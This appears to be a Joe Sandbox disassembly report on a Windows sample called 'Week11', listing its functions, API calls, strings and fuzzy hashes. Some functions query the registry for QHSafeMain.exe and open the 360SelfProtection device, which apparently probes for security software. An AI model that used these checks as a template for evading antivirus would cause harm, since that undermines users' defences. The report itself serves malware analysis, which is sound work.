                                  • Part of subcall function 00444E30: LeaveCriticalSection.KERNEL32(004C17A0,?,00000000,00444B51), ref: 00444E4E
                                  • Part of subcall function 00444E30: DeleteCriticalSection.KERNEL32(004C17A0,?,00000000,00444B51), ref: 00444E5F
                                • GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 00444B32
                                  • Part of subcall function 004451A0: EnterCriticalSection.KERNEL32(?,1D1D1D8C,00000000,?,00000000,?,004AE3A8,000000FF,?,00444C6C), ref: 004451D9
                                  • Part of subcall function 004451A0: LeaveCriticalSection.KERNEL32(?,?,00000000,lLD,?,00444C6C), ref: 004451F8
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$EnterLeaveModulelstrlen$DeleteFileHandleInitializeName_memcpy_s
                                • String ID: Module$Module_Raw
                                • API String ID: 1810964915-3885325121
                                • Opcode ID: 700350051548fce2208a6a5a5c7cf5ad1f3ebc343a56650007e18ae760c4b804
                                • Instruction ID: 494cad99fbb1b6d175b9fadff906d44573b9ece5d116a3faa76882d380121015
                                • Opcode Fuzzy Hash: 700350051548fce2208a6a5a5c7cf5ad1f3ebc343a56650007e18ae760c4b804
                                • Instruction Fuzzy Hash: 7C71A472A003289BDB20EF55DC81BDEB3B4AB89300F4445EFE509A7641DA795F84CF56
                                Function 0042E880 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 169fileCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?), ref: 0042E8F9
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?), ref: 0042E914
                                • DeleteFileW.KERNEL32(00000000,00000060,?,?,?,?,?), ref: 0042E9DD
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: GdipImage$DeleteFileHeightWidth
                                • String ID: `$disable_resize
                                • API String ID: 3141775222-3937757610
                                • Opcode ID: b7658bc32c9bc854b704c8f6d4bec8622a21e3a4a05c109f10e12c9a2c703e6d
                                • Instruction ID: ff89199e905f92868ec6afd1d0e0eddcff62de400e4f457d5489a80cf1b5a4df
                                • Opcode Fuzzy Hash: b7658bc32c9bc854b704c8f6d4bec8622a21e3a4a05c109f10e12c9a2c703e6d
                                • Instruction Fuzzy Hash: 19518071E002199FDB00DF99D881BEEB7B4EF48314F14826EE414A7381D779AD45CBA4
                                Function 0047C190 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 44registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32 ref: 0047C1B0
                                • RegQueryValueExW.ADVAPI32(?,Path,00000000), ref: 0047C1E0
                                • RegCloseKey.ADVAPI32 ref: 0047C1EA
                                Strings
                                • Path, xrefs: 0047C1CA
                                • SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe, xrefs: 0047C19E
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: Path$SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\QHSafeMain.exe
                                • API String ID: 3677997916-3679634941
                                • Opcode ID: c609494d3decce896197143f3c948b6b2c40217c85e735f4df6da4ac155ca6eb
                                • Instruction ID: 5cc2b2dabf8d17e85a47baeb05aff397b932bd6a24fd528b1e55104abd980340
                                • Opcode Fuzzy Hash: c609494d3decce896197143f3c948b6b2c40217c85e735f4df6da4ac155ca6eb
                                • Instruction Fuzzy Hash: 98015EB45043019BD310DF94DD49B6777F8FB88780F44891CE989C6295E7B89608CB9A
                                Function 00476410 Relevance: 7.7, APIs: 5, Instructions: 214fileCOMMON
                                Download Yara Rule
                                APIs
                                • GetFileSizeEx.KERNEL32(?,?,?,?,?,00000000,00000002,00474F20,?,?,?,?,?,?,?,?), ref: 00476429
                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 004764B9
                                • ReadFile.KERNEL32(?,?,?,?,00000000,?,?,?,?), ref: 004764D5
                                • SetFilePointerEx.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?), ref: 00476561
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: File$Pointer$ReadSize
                                • String ID:
                                • API String ID: 1971422761-0
                                • Opcode ID: 8683eabe37eab7cf91449b06bdee2d0afaf99d5bccd11f26cac3b1ec51355f0d
                                • Instruction ID: e6f0fb11df94be645a216d2bb3491fedcf900024f3741c6f7ed84ff38b986a3f
                                • Opcode Fuzzy Hash: 8683eabe37eab7cf91449b06bdee2d0afaf99d5bccd11f26cac3b1ec51355f0d
                                • Instruction Fuzzy Hash: 1761F3317006006FD710DE29DC80BABB7EAEFC4714F55842EF948D7340DA29ED0587AA
                                Function 0042EB60 Relevance: 7.6, APIs: 5, Instructions: 111windowCOMMON
                                Download Yara Rule
                                APIs
                                • GdipGetImageWidth.GDIPLUS(?,?,00000000,00000000,?,?,?,?,?,?), ref: 0042EB77
                                • GdipGetImageHeight.GDIPLUS(?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 0042EB8E
                                • GdipBitmapGetPixel.GDIPLUS(?,?,00000000,?,?,?,?,?,00000000,00000000,?,?,?,?,?,?), ref: 0042EBD2
                                • GdipBitmapSetPixel.GDIPLUS(?,?,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?,?,?,?), ref: 0042EC4A
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Gdip$BitmapImagePixel$HeightWidth
                                • String ID:
                                • API String ID: 2829946855-0
                                • Opcode ID: f862b07dcfaf982a729aa9a4d05fc39aa9f1e3f59dbe84cb31b35247377525d4
                                • Instruction ID: 2c829de194d8e7e939257bfd7cab5a5ead03b21767c36fa911ce7e5fa7ef3289
                                • Opcode Fuzzy Hash: f862b07dcfaf982a729aa9a4d05fc39aa9f1e3f59dbe84cb31b35247377525d4
                                • Instruction Fuzzy Hash: D43184B0A0422AAFCB14DF97D8C09BFFBB4EB45344B50896EE91597301D638E945CBA4
                                Function 0044E590 Relevance: 7.6, APIs: 5, Instructions: 59libraryCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleW.KERNEL32 ref: 0044E5A8
                                • _memset.LIBCMT ref: 0044E5C6
                                • GetCurrentProcessId.KERNEL32 ref: 0044E5D2
                                  • Part of subcall function 0044D7A0: CreateFileW.KERNEL32(\\.\360SelfProtection,00000080,00000003,00000000,00000003,00000000,00000000,?), ref: 0044D7C2
                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0044E60D
                                • LoadLibraryW.KERNEL32 ref: 0044E622
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FileModule$CreateCurrentHandleLibraryLoadNameProcess_memset
                                • String ID:
                                • API String ID: 2606892308-0
                                • Opcode ID: 2d378d8137bf286bc2442f9025dc69fb9612536ce2b08e05aa3e7fa4bdd0725e
                                • Instruction ID: d94a8efb88a648c79ce7a2197391e053e36834648fcec17235d1e45d9b802593
                                • Opcode Fuzzy Hash: 2d378d8137bf286bc2442f9025dc69fb9612536ce2b08e05aa3e7fa4bdd0725e
                                • Instruction Fuzzy Hash: C411A572A001185BEB10BBA6AC056EF7368EF54315F4105BEFE05D3242EE385E568BDD
                                Function 004AA470 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 57COMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(004E40A8,004AA8C9,?,00001000,?,00000000,00001000), ref: 004AA475
                                • LeaveCriticalSection.KERNEL32(004E40A8,?,?,004E4028), ref: 004AA49D
                                • LeaveCriticalSection.KERNEL32(004E40A8,?), ref: 004AA4F1
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$Enter
                                • String ID: (@N
                                • API String ID: 2978645861-2818764248
                                • Opcode ID: a0c3b3daa29bfa4189656d82790d8a136bb242fb50074e129ce51e60f281b0c3
                                • Instruction ID: da59f3a5de333eabb256a7be73b97da816f0e36ca79450be3947466fb61e47b7
                                • Opcode Fuzzy Hash: a0c3b3daa29bfa4189656d82790d8a136bb242fb50074e129ce51e60f281b0c3
                                • Instruction Fuzzy Hash: 4501083EA042806BD7518769A804B5B3BD4EBE7B12F15427EF98087391C66D9C48C32E
                                Function 00444600 Relevance: 7.5, APIs: 5, Instructions: 49threadCOMMON
                                Download Yara Rule
                                APIs
                                • EnterCriticalSection.KERNEL32(?,?,00000000,00000000,0043D612), ref: 0044460D
                                • GetCurrentThreadId.KERNEL32 ref: 00444613
                                • LeaveCriticalSection.KERNEL32(?), ref: 0044463F
                                • LeaveCriticalSection.KERNEL32(?), ref: 00444653
                                • LeaveCriticalSection.KERNEL32(?), ref: 00444667
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalSection$Leave$CurrentEnterThread
                                • String ID:
                                • API String ID: 2905768538-0
                                • Opcode ID: 48c3365be456e69c38792874bc02d6ce321f47a72e1faf2863876e342a46f018
                                • Instruction ID: 9fd2ec6da090b03a266953b404545f0a2167e51fb7a0dd56e9dae6a2765b04a3
                                • Opcode Fuzzy Hash: 48c3365be456e69c38792874bc02d6ce321f47a72e1faf2863876e342a46f018
                                • Instruction Fuzzy Hash: 1E01313A3011219B9B105FB9BC4895AB3A9EBC5A76311073FFA15D3261CB39EC01869C
                                Function 004924EB Relevance: 7.5, APIs: 5, Instructions: 47COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __getptd.LIBCMT ref: 004924F7
                                  • Part of subcall function 00493E12: __getptd_noexit.LIBCMT ref: 00493E15
                                  • Part of subcall function 00493E12: __amsg_exit.LIBCMT ref: 00493E22
                                • __amsg_exit.LIBCMT ref: 00492517
                                • __lock.LIBCMT ref: 00492527
                                • InterlockedDecrement.KERNEL32(?), ref: 00492544
                                • InterlockedIncrement.KERNEL32(004DBFA0), ref: 0049256F
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
                                • String ID:
                                • API String ID: 4271482742-0
                                • Opcode ID: ec39a07a53b1fb87dea2d308df436eb8949990230ea863193436d1826a43d929
                                • Instruction ID: 7b58c1805217bfa1243444889c2cdd4b285adf1c6ea72e9bdd8169ee41ce574b
                                • Opcode Fuzzy Hash: ec39a07a53b1fb87dea2d308df436eb8949990230ea863193436d1826a43d929
                                • Instruction Fuzzy Hash: 3D01A532902612B7CF15BB6A9955B5E7B60AB04B24F45413BE80063381CB7C9D51CBDD
                                Function 0048C860 Relevance: 7.5, APIs: 5, Instructions: 44memoryCOMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • __lock.LIBCMT ref: 0048C87E
                                  • Part of subcall function 00498F22: __mtinitlocknum.LIBCMT ref: 00498F38
                                  • Part of subcall function 00498F22: __amsg_exit.LIBCMT ref: 00498F44
                                  • Part of subcall function 00498F22: EnterCriticalSection.KERNEL32(?,?,?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001), ref: 00498F4C
                                • ___sbh_find_block.LIBCMT ref: 0048C889
                                • ___sbh_free_block.LIBCMT ref: 0048C898
                                • HeapFree.KERNEL32(00000000,00000104,004CCF20,0000000C,00498F03,00000000,004CD298,0000000C,00498F3D,00000104,?,?,0049F87E,00000004,004CD540,0000000C), ref: 0048C8C8
                                • GetLastError.KERNEL32(?,0049F87E,00000004,004CD540,0000000C,004956B7,00000104,?,00000000,00000000,00000000,?,00493DC4,00000001,00000214), ref: 0048C8D9
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                • String ID:
                                • API String ID: 2714421763-0
                                • Opcode ID: f0df74bff2548eabd0d5e7aead0b02a42e16e7b8fb6c5b7b517cbdb3993b94d8
                                • Instruction ID: 37416baaaaa4a8fedffa96a7fd59b41a6501cbbfe9fd35fc4104acc3da91138d
                                • Opcode Fuzzy Hash: f0df74bff2548eabd0d5e7aead0b02a42e16e7b8fb6c5b7b517cbdb3993b94d8
                                • Instruction Fuzzy Hash: D601A231985301EADF247B769C4A75E3B689F0132AF14093FF408AA1C1CF3C89458B6C
                                Function 0045E970 Relevance: 7.5, APIs: 5, Instructions: 33COMMON
                                Download Yara Rule
                                APIs
                                • IsWindow.USER32(?), ref: 0045E975
                                • OpenMutexW.KERNEL32(001F0001,00000000,?,?,00465868), ref: 0045E992
                                • GetLastError.KERNEL32(?,00465868), ref: 0045E99C
                                • CloseHandle.KERNEL32(00000000,?,00465868), ref: 0045E9BC
                                • DestroyWindow.USER32(?,?,00465868), ref: 0045E9C6
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: Window$CloseDestroyErrorHandleLastMutexOpen
                                • String ID:
                                • API String ID: 1468468148-0
                                • Opcode ID: 19a5fc912070102aafda8e131be308ed1bd7412c02d9a6c75f6a602a74787fc4
                                • Instruction ID: 33dab0c8709179d15137cc52d378e2cfd7b9d0d142e94031476c919a29004ac5
                                • Opcode Fuzzy Hash: 19a5fc912070102aafda8e131be308ed1bd7412c02d9a6c75f6a602a74787fc4
                                • Instruction Fuzzy Hash: 6FF030B1600700DFD7689B75D94DB6777EDBB44702F544A2DF842C6691CB78E804CB18
                                Function 00472090 Relevance: 7.5, APIs: 2, Strings: 2, Instructions: 459COMMON
                                Download Yara Rule
                                APIs
                                • _memset.LIBCMT ref: 004723DE
                                • GetFullPathNameW.KERNEL32(?,?,?,00000000,?,?,?,?,00000000,?,?,?), ref: 004723FE
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: FullNamePath_memset
                                • String ID: \..\$j)F
                                • API String ID: 2554471374-2307207292
                                • Opcode ID: 1b4045b28796c15d52f1317b1aad7747d8893830a086f33a958b6ccf7191bfb4
                                • Instruction ID: d9fcb76202b8c92c2036ff5ccb9d87a47571da3a3f785901b21d90a2ee1cc94f
                                • Opcode Fuzzy Hash: 1b4045b28796c15d52f1317b1aad7747d8893830a086f33a958b6ccf7191bfb4
                                • Instruction Fuzzy Hash: 8D12BF719012159FCB21EB68CD85BDEB3B0AF84314F1482DAE41D67281DB78AF85CB99
                                Function 00466350 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 360COMMON
                                Download Yara Rule
                                APIs
                                • ShowWindow.USER32(?,00000001,?,00000000,00000000,8600C000,00010100,00000000,?), ref: 00466761
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480725696.00000000004E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480820324.0000000000516000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480871088.0000000000522000.00000008.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480927386.000000000052E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_400000_Week11.jbxd
                                Similarity
                                • API ID: ShowWindow
                                • String ID: IDS_DATE_TIME_FMT$T9N$T9N
                                • API String ID: 1268545403-4252793494
                                • Opcode ID: c575310137a067cb433eb9c4be9593b416a010c577d6bae7e6d705c00c67d65d
                                • Instruction ID: 6e9d00e1c43c49f898589a134176e963eef41d57f069eba1c746a3cb215e7b45
                                • Opcode Fuzzy Hash: c575310137a067cb433eb9c4be9593b416a010c577d6bae7e6d705c00c67d65d
                                • Instruction Fuzzy Hash: E7E1A3709002159FDB14DF68CC85B9EB7B4EF44314F1582EAE419AB392DB38AE84CF95
                                Function 00434A80 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 326COMMON
                                Download Yara Rule
                                APIs
                                • CopyRect.USER32(?,?), ref: 00434C80
                                • OffsetRect.USER32(?,00000000,?), ref: 00434CB3
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.2480417119.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000001.00000002.2480388113.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480550310.00000000004B8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480615925.00000000004DB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.2480663853.00000000004DC000.00000008.00000001.01000000.00000003.sdmpDownload File
